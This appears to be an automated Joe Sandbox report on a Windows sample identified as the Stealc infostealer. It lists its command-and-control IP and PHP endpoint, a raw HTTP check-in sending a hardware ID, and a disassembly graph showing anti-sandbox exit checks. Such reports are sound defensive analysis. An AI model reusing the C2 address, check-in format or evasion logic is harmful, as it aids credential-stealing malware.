                File and Directory Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                DLL Side-Loading                		Proc Filesystem324
                System Information Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                file.exe100%AviraTR/Crypt.TPM.Gen
                file.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37/100%URL Reputationmalware
                http://185.215.113.37100%URL Reputationmalware
                http://185.215.113.37/e2b1563c6670f193.php100%URL Reputationmalware

                Domains and IPs

                Contacted Domains

                No contacted domains info

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                http://185.215.113.37/true
                • URL Reputation: malware
                • URL Reputation: malware
                		unknown
                http://185.215.113.37/e2b1563c6670f193.phptrue
                • URL Reputation: malware
                		unknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://185.215.113.370file.exe, 00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmptrue
                  		unknown
                  http://185.215.113.37file.exe, 00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmptrue
                  • URL Reputation: malware
                  		unknown

                  World Map of Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public IPs

                  IPDomainCountryFlagASNASN NameMalicious
                  185.215.113.37
                  		unknownPortugal
                  		206894WHOLESALECONNECTIONSNLtrue

                  General Information

                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1528897
                  Start date and time:2024-10-08 12:31:06 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 5m 5s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:9
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:file.exe
                  Detection:MAL
                  Classification:mal100.troj.evad.winEXE@1/0@0/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 80%
                  • Number of executed functions: 19
                  • Number of non-executed functions: 86
                  Cookbook Comments:
                  • Found application associated with file extension: .exe

                  Warnings

                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe
                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  185.215.113.37file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37/e2b1563c6670f193.php
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37/e2b1563c6670f193.php

                  Domains

                  No context

                  ASNs

                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37
                  7AeSqNv1rC.exeGet hashmaliciousMicroClip, VidarBrowse
                  • 185.215.113.117
                  file.exeGet hashmaliciousStealcBrowse
                  • 185.215.113.37
                  file.exeGet hashmaliciousStealc, VidarBrowse
                  • 185.215.113.37

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  No created / dropped files found

                  Static File Info

                  General

                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.946805946081707
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:file.exe
                  File size:1'847'808 bytes
                  MD5:555446e29069811f705b562473456397
                  SHA1:4545adba658522cf1035be16883def9c888c79e3
                  SHA256:ca41747721e954859ba3e691ac62a90dd426459f5622cdd2729e34c1bc64fdbc
                  SHA512:dbe1dc92ff54a08fe656207c71ce97ed4b0d3a7dda8de91bd2445124dd407124991e7b5e2b2c6b7a0ad02d38ffc26091f977e40e431654e8f965f2547c07b121
                  SSDEEP:49152:3TC4p7SH09Kl2zBDZOJoUH9+uZN3EevX:3x7SHeKl2NDZcowRTX
                  TLSH:538533AD467D7B27CEDFEABB874B9006C7E565B0427D92FB10F43606C419A3D6839028
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........

                  File Icon

                  Icon Hash:00928e8e8686b000

                  Static PE Info

                  General

                  Entrypoint:0xa9f000
                  Entrypoint Section:.taggant
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:2eabe9054cad5152567f0699947a2c5b

                  Entrypoint Preview

                  Instruction
                  jmp 00007F5ED4D68BFAh
                  movups xmm3, dqword ptr [eax+eax]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  jmp 00007F5ED4D6ABF5h
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al

                  Rich Headers

                  Programming Language:
                  • [C++] VS2010 build 30319
                  • [ASM] VS2010 build 30319
                  • [ C ] VS2010 build 30319
                  • [ C ] VS2008 SP1 build 30729
                  • [IMP] VS2008 SP1 build 30729
                  • [LNK] VS2010 build 30319

                  Data Directories

                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x25d0500x64.idata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x25d1f80x8.idata
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                  Sections

                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  0x10000x25b0000x2280050c2b416d8d4faeef21ac8b94afe98cdunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc 0x25c0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .idata 0x25d0000x10000x200c60c4959cc8d384ac402730cc6842bb0False0.1328125data0.9064079259880791IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  0x25e0000x2a30000x2004dd03543d2c1dfb3ae1e233e6dabaabcunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  xsbjvjcw0x5010000x19d0000x19d000e6eee176a43ddaf29d428f9d6f130a66False0.994823391154661data7.9535443990541745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  jgzmrfrk0x69e0000x10000x4001ce73c1eecd8b7174193ea00ab6575fbFalse0.763671875data5.970532972526244IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .taggant0x69f0000x30000x22007ce881734d52dc90afe9e4bedda19f12False0.006433823529411764DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                  Imports

                  DLLImport
                  kernel32.dlllstrcpy

                  Network Behavior

                  Suricata IDS Alerts

                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-10-08T12:32:11.465876+02002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.649727185.215.113.3780TCP

                  Network Port Distribution

                  TCP Packets

                  TimestampSource PortDest PortSource IPDest IP
                  Oct 8, 2024 12:32:10.509358883 CEST4972780192.168.2.6185.215.113.37
                  Oct 8, 2024 12:32:10.514188051 CEST8049727185.215.113.37192.168.2.6
                  Oct 8, 2024 12:32:10.514271975 CEST4972780192.168.2.6185.215.113.37
                  Oct 8, 2024 12:32:10.517584085 CEST4972780192.168.2.6185.215.113.37
                  Oct 8, 2024 12:32:10.522346973 CEST8049727185.215.113.37192.168.2.6
                  Oct 8, 2024 12:32:11.209135056 CEST8049727185.215.113.37192.168.2.6
                  Oct 8, 2024 12:32:11.209291935 CEST4972780192.168.2.6185.215.113.37
                  Oct 8, 2024 12:32:11.231838942 CEST4972780192.168.2.6185.215.113.37
                  Oct 8, 2024 12:32:11.236675024 CEST8049727185.215.113.37192.168.2.6
                  Oct 8, 2024 12:32:11.462222099 CEST8049727185.215.113.37192.168.2.6
                  Oct 8, 2024 12:32:11.465876102 CEST4972780192.168.2.6185.215.113.37
                  Oct 8, 2024 12:32:13.717098951 CEST4972780192.168.2.6185.215.113.37

                  HTTP Request Dependency Graph

                  • 185.215.113.37

                  HTTP Packets

                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.649727185.215.113.37805476C:\Users\user\Desktop\file.exe
                  TimestampBytes transferredDirectionData
                  Oct 8, 2024 12:32:10.517584085 CEST89OUTGET / HTTP/1.1
                  Host: 185.215.113.37
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Oct 8, 2024 12:32:11.209135056 CEST203INHTTP/1.1 200 OK
                  Date: Tue, 08 Oct 2024 10:32:11 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Content-Length: 0
                  Keep-Alive: timeout=5, max=100
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Oct 8, 2024 12:32:11.231838942 CEST412OUTPOST /e2b1563c6670f193.php HTTP/1.1
                  Content-Type: multipart/form-data; boundary=----AFHDAKJKFCFBGCBGDHCB
                  Host: 185.215.113.37
                  Content-Length: 211
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  Data Raw: 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 36 35 41 38 37 38 32 46 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 41 46 48 44 41 4b 4a 4b 46 43 46 42 47 43 42 47 44 48 43 42 2d 2d 0d 0a
                  Data Ascii: ------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="hwid"4965A8782FD72284582127------AFHDAKJKFCFBGCBGDHCBContent-Disposition: form-data; name="build"doma------AFHDAKJKFCFBGCBGDHCB--
                  Oct 8, 2024 12:32:11.462222099 CEST210INHTTP/1.1 200 OK
                  Date: Tue, 08 Oct 2024 10:32:11 GMT
                  Server: Apache/2.4.52 (Ubuntu)
                  Content-Length: 8
                  Keep-Alive: timeout=5, max=99
                  Connection: Keep-Alive
                  Content-Type: text/html; charset=UTF-8
                  Data Raw: 59 6d 78 76 59 32 73 3d
                  Data Ascii: YmxvY2s=


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  High Level Behavior Distribution

                  Click to dive into process behavior distribution

                  System Behavior

                  General

                  Target ID:0
                  Start time:06:32:06
                  Start date:08/10/2024
                  Path:C:\Users\user\Desktop\file.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\file.exe"
                  Imagebase:0x3b0000
                  File size:1'847'808 bytes
                  MD5 hash:555446E29069811F705B562473456397
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2238045865.00000000003B1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2239077197.000000000116E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2197795166.0000000004D60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                  Reputation:low
                  Has exited:true

                  Disassembly

                  Reset < >

                    Execution Graph

                    Execution Coverage:8.1%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:9.7%
                    Total number of Nodes:2000
                    Total number of Limit Nodes:24
                    execution_graph 13424 3c69f0 13469 3b2260 13424->13469 13448 3c6a64 13449 3ca9b0 4 API calls 13448->13449 13450 3c6a6b 13449->13450 13451 3ca9b0 4 API calls 13450->13451 13452 3c6a72 13451->13452 13453 3ca9b0 4 API calls 13452->13453 13454 3c6a79 13453->13454 13455 3ca9b0 4 API calls 13454->13455 13456 3c6a80 13455->13456 13621 3ca8a0 13456->13621 13458 3c6a89 13459 3c6b0c 13458->13459 13461 3c6ac2 OpenEventA 13458->13461 13625 3c6920 GetSystemTime 13459->13625 13463 3c6ad9 13461->13463 13464 3c6af5 CloseHandle Sleep 13461->13464 13468 3c6ae1 CreateEventA 13463->13468 13466 3c6b0a 13464->13466 13466->13458 13468->13459 13822 3b45c0 13469->13822 13471 3b2274 13472 3b45c0 2 API calls 13471->13472 13473 3b228d 13472->13473 13474 3b45c0 2 API calls 13473->13474 13475 3b22a6 13474->13475 13476 3b45c0 2 API calls 13475->13476 13477 3b22bf 13476->13477 13478 3b45c0 2 API calls 13477->13478 13479 3b22d8 13478->13479 13480 3b45c0 2 API calls 13479->13480 13481 3b22f1 13480->13481 13482 3b45c0 2 API calls 13481->13482 13483 3b230a 13482->13483 13484 3b45c0 2 API calls 13483->13484 13485 3b2323 13484->13485 13486 3b45c0 2 API calls 13485->13486 13487 3b233c 13486->13487 13488 3b45c0 2 API calls 13487->13488 13489 3b2355 13488->13489 13490 3b45c0 2 API calls 13489->13490 13491 3b236e 13490->13491 13492 3b45c0 2 API calls 13491->13492 13493 3b2387 13492->13493 13494 3b45c0 2 API calls 13493->13494 13495 3b23a0 13494->13495 13496 3b45c0 2 API calls 13495->13496 13497 3b23b9 13496->13497 13498 3b45c0 2 API calls 13497->13498 13499 3b23d2 13498->13499 13500 3b45c0 2 API calls 13499->13500 13501 3b23eb 13500->13501 13502 3b45c0 2 API calls 13501->13502 13503 3b2404 13502->13503 13504 3b45c0 2 API calls 13503->13504 13505 3b241d 13504->13505 13506 3b45c0 2 API calls 13505->13506 13507 3b2436 13506->13507 13508 3b45c0 2 API calls 13507->13508 13509 3b244f 13508->13509 13510 3b45c0 2 API calls 13509->13510 13511 3b2468 13510->13511 13512 3b45c0 2 API calls 13511->13512 13513 3b2481 13512->13513 13514 3b45c0 2 API calls 13513->13514 13515 3b249a 13514->13515 13516 3b45c0 2 API calls 13515->13516 13517 3b24b3 13516->13517 13518 3b45c0 2 API calls 13517->13518 13519 3b24cc 13518->13519 13520 3b45c0 2 API calls 13519->13520 13521 3b24e5 13520->13521 13522 3b45c0 2 API calls 13521->13522 13523 3b24fe 13522->13523 13524 3b45c0 2 API calls 13523->13524 13525 3b2517 13524->13525 13526 3b45c0 2 API calls 13525->13526 13527 3b2530 13526->13527 13528 3b45c0 2 API calls 13527->13528 13529 3b2549 13528->13529 13530 3b45c0 2 API calls 13529->13530 13531 3b2562 13530->13531 13532 3b45c0 2 API calls 13531->13532 13533 3b257b 13532->13533 13534 3b45c0 2 API calls 13533->13534 13535 3b2594 13534->13535 13536 3b45c0 2 API calls 13535->13536 13537 3b25ad 13536->13537 13538 3b45c0 2 API calls 13537->13538 13539 3b25c6 13538->13539 13540 3b45c0 2 API calls 13539->13540 13541 3b25df 13540->13541 13542 3b45c0 2 API calls 13541->13542 13543 3b25f8 13542->13543 13544 3b45c0 2 API calls 13543->13544 13545 3b2611 13544->13545 13546 3b45c0 2 API calls 13545->13546 13547 3b262a 13546->13547 13548 3b45c0 2 API calls 13547->13548 13549 3b2643 13548->13549 13550 3b45c0 2 API calls 13549->13550 13551 3b265c 13550->13551 13552 3b45c0 2 API calls 13551->13552 13553 3b2675 13552->13553 13554 3b45c0 2 API calls 13553->13554 13555 3b268e 13554->13555 13556 3c9860 13555->13556 13827 3c9750 GetPEB 13556->13827 13558 3c9868 13559 3c9a93 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 13558->13559 13562 3c987a 13558->13562 13560 3c9b0d 13559->13560 13561 3c9af4 GetProcAddress 13559->13561 13563 3c9b46 13560->13563 13564 3c9b16 GetProcAddress GetProcAddress 13560->13564 13561->13560 13565 3c988c 21 API calls 13562->13565 13566 3c9b4f GetProcAddress 13563->13566 13567 3c9b68 13563->13567 13564->13563 13565->13559 13566->13567 13568 3c9b89 13567->13568 13569 3c9b71 GetProcAddress 13567->13569 13570 3c6a00 13568->13570 13571 3c9b92 GetProcAddress GetProcAddress 13568->13571 13569->13568 13572 3ca740 13570->13572 13571->13570 13573 3ca750 13572->13573 13574 3c6a0d 13573->13574 13575 3ca77e lstrcpy 13573->13575 13576 3b11d0 13574->13576 13575->13574 13577 3b11e8 13576->13577 13578 3b120f ExitProcess 13577->13578 13579 3b1217 13577->13579 13580 3b1160 GetSystemInfo 13579->13580 13581 3b117c ExitProcess 13580->13581 13582 3b1184 13580->13582 13583 3b1110 GetCurrentProcess VirtualAllocExNuma 13582->13583 13584 3b1149 13583->13584 13585 3b1141 ExitProcess 13583->13585 13828 3b10a0 VirtualAlloc 13584->13828 13588 3b1220 13832 3c89b0 13588->13832 13591 3b1249 __aulldiv 13592 3b129a 13591->13592 13593 3b1292 ExitProcess 13591->13593 13594 3c6770 GetUserDefaultLangID 13592->13594 13595 3c6792 13594->13595 13596 3c67d3 13594->13596 13595->13596 13597 3c67ad ExitProcess 13595->13597 13598 3c67cb ExitProcess 13595->13598 13599 3c67b7 ExitProcess 13595->13599 13600 3c67c1 ExitProcess 13595->13600 13601 3c67a3 ExitProcess 13595->13601 13602 3b1190 13596->13602 13603 3c78e0 3 API calls 13602->13603 13604 3b119e 13603->13604 13605 3b11cc 13604->13605 13606 3c7850 3 API calls 13604->13606 13609 3c7850 GetProcessHeap RtlAllocateHeap GetUserNameA 13605->13609 13607 3b11b7 13606->13607 13607->13605 13608 3b11c4 ExitProcess 13607->13608 13610 3c6a30 13609->13610 13611 3c78e0 GetProcessHeap RtlAllocateHeap GetComputerNameA 13610->13611 13612 3c6a43 13611->13612 13613 3ca9b0 13612->13613 13834 3ca710 13613->13834 13615 3ca9c1 lstrlen 13616 3ca9e0 13615->13616 13617 3caa18 13616->13617 13619 3ca9fa lstrcpy lstrcat 13616->13619 13835 3ca7a0 13617->13835 13619->13617 13620 3caa24 13620->13448 13622 3ca8bb 13621->13622 13623 3ca90b 13622->13623 13624 3ca8f9 lstrcpy 13622->13624 13623->13458 13624->13623 13839 3c6820 13625->13839 13627 3c698e 13628 3c6998 sscanf 13627->13628 13868 3ca800 13628->13868 13630 3c69aa SystemTimeToFileTime SystemTimeToFileTime 13631 3c69ce 13630->13631 13632 3c69e0 13630->13632 13631->13632 13633 3c69d8 ExitProcess 13631->13633 13634 3c5b10 13632->13634 13635 3c5b1d 13634->13635 13636 3ca740 lstrcpy 13635->13636 13637 3c5b2e 13636->13637 13870 3ca820 lstrlen 13637->13870 13640 3ca820 2 API calls 13641 3c5b64 13640->13641 13642 3ca820 2 API calls 13641->13642 13643 3c5b74 13642->13643 13874 3c6430 13643->13874 13646 3ca820 2 API calls 13647 3c5b93 13646->13647 13648 3ca820 2 API calls 13647->13648 13649 3c5ba0 13648->13649 13650 3ca820 2 API calls 13649->13650 13651 3c5bad 13650->13651 13652 3ca820 2 API calls 13651->13652 13653 3c5bf9 13652->13653 13883 3b26a0 13653->13883 13661 3c5cc3 13662 3c6430 lstrcpy 13661->13662 13663 3c5cd5 13662->13663 13664 3ca7a0 lstrcpy 13663->13664 13665 3c5cf2 13664->13665 13666 3ca9b0 4 API calls 13665->13666 13667 3c5d0a 13666->13667 13668 3ca8a0 lstrcpy 13667->13668 13669 3c5d16 13668->13669 13670 3ca9b0 4 API calls 13669->13670 13671 3c5d3a 13670->13671 13672 3ca8a0 lstrcpy 13671->13672 13673 3c5d46 13672->13673 13674 3ca9b0 4 API calls 13673->13674 13675 3c5d6a 13674->13675 13676 3ca8a0 lstrcpy 13675->13676 13677 3c5d76 13676->13677 13678 3ca740 lstrcpy 13677->13678 13679 3c5d9e 13678->13679 14609 3c7500 GetWindowsDirectoryA 13679->14609 13682 3ca7a0 lstrcpy 13683 3c5db8 13682->13683 14619 3b4880 13683->14619 13685 3c5dbe 14764 3c17a0 13685->14764 13687 3c5dc6 13688 3ca740 lstrcpy 13687->13688 13689 3c5de9 13688->13689 13690 3b1590 lstrcpy 13689->13690 13691 3c5dfd 13690->13691 14780 3b5960 13691->14780 13693 3c5e03 14924 3c1050 13693->14924 13695 3c5e0e 13696 3ca740 lstrcpy 13695->13696 13697 3c5e32 13696->13697 13698 3b1590 lstrcpy 13697->13698 13699 3c5e46 13698->13699 13700 3b5960 34 API calls 13699->13700 13701 3c5e4c 13700->13701 14928 3c0d90 13701->14928 13703 3c5e57 13704 3ca740 lstrcpy 13703->13704 13705 3c5e79 13704->13705 13706 3b1590 lstrcpy 13705->13706 13707 3c5e8d 13706->13707 13708 3b5960 34 API calls 13707->13708 13709 3c5e93 13708->13709 14935 3c0f40 13709->14935 13711 3c5e9e 13712 3b1590 lstrcpy 13711->13712 13713 3c5eb5 13712->13713 14940 3c1a10 13713->14940 13715 3c5eba 13716 3ca740 lstrcpy 13715->13716 13717 3c5ed6 13716->13717 15284 3b4fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13717->15284 13719 3c5edb 13720 3b1590 lstrcpy 13719->13720 13721 3c5f5b 13720->13721 15291 3c0740 13721->15291 13723 3c5f60 13724 3ca740 lstrcpy 13723->13724 13725 3c5f86 13724->13725 13726 3b1590 lstrcpy 13725->13726 13727 3c5f9a 13726->13727 13728 3b5960 34 API calls 13727->13728 13729 3c5fa0 13728->13729 13823 3b45d1 RtlAllocateHeap 13822->13823 13826 3b4621 VirtualProtect 13823->13826 13826->13471 13827->13558 13830 3b10c2 codecvt 13828->13830 13829 3b10fd 13829->13588 13830->13829 13831 3b10e2 VirtualFree 13830->13831 13831->13829 13833 3b1233 GlobalMemoryStatusEx 13832->13833 13833->13591 13834->13615 13836 3ca7c2 13835->13836 13837 3ca7ec 13836->13837 13838 3ca7da lstrcpy 13836->13838 13837->13620 13838->13837 13840 3ca740 lstrcpy 13839->13840 13841 3c6833 13840->13841 13842 3ca9b0 4 API calls 13841->13842 13843 3c6845 13842->13843 13844 3ca8a0 